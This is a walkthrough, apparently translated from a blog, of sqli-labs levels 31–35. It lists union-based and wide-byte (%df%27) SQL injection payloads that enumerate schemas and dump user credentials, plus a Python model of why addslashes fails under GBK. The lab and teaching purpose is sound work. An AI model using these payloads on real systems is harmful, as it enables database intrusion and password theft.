Level 31 (") closure)
Query the database
?id=") union select 1,2,database() --+
Query the tables
?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Query the columns
?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
Query the data
?id= ") union select 1,2,group_concat(username,0x7e,password) from users --+
Level 32 (wide-byte injection)
Query the database
?id=-1%df%27%20union%20select%201,database(),3%20--+
Query the tables
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
Query the columns
?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+
Query the data
?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
Level 33 (wide-byte injection)
Query the database
?id=-1%df%27%20union%20select%201,database(),3%20--+
Query the tables
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
Query the columns
?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+
Query the data
?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
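Level 34 (POST, wide-byte)
This level uses the addslashes function to escape both the username and the password.
Capture the login request with Burp Suite, then send it to Repeater.
Query the database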
%df' union select 1,database()#
Query the tables
%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
Query the columns
%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
Query the data
%df%27 union select 1,group_concat(password,username) from users#
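Why the addslashes escaping in levels 32-34 fails to hold, shown as an added example that is not part of the original post. It is a byte-level model: addslashes() below is a simplified re-implementation written for this illustration, and unescaped_quotes() is a hypothetical helper that approximates how a server decodes the escaped bytes under a given connection charset.

```python
# Added example: byte-level model of the wide-byte problem in levels 32-34.
# Both functions are written for this illustration (assumptions, not lab code).

def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping that knows nothing about the connection charset."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):   # ' " and backslash
            out.append(0x5C)          # prepend a backslash byte
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that are NOT preceded by a backslash once the
    bytes are decoded with `charset`. Any such quote ends the SQL string."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":           # backslash escapes the next character
            i += 2
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


# Constructed sample: the %df%27 prefix used in the requests above.
SAMPLE = b"\xdf'"

if __name__ == "__main__":
    escaped = addslashes(SAMPLE)      # bytes DF 5C 27
    for charset in ("gbk", "utf-8"):
        # Under GBK, DF 5C is one two-byte character, so the backslash is
        # absorbed and the quote is left bare. Under UTF-8, DF is an invalid
        # lead byte here, 5C stays a backslash, and the quote stays escaped.
        print(charset, escaped.decode(charset, errors="replace"),
              "bare quotes:", unescaped_quotes(escaped, charset))
```

The escaping only holds when the escaping routine and the database connection agree on the charset. Prepared statements avoid the problem because the value never passes through string escaping.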
Level 35 (numeric context, direct injection)
Query the database
?id=-1 union select 1,2,database()#
Query the tables
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#
Query the columns
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273#
Query the data
?id=-1 union select 1,2,group_concat(username,password)from users #
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141569073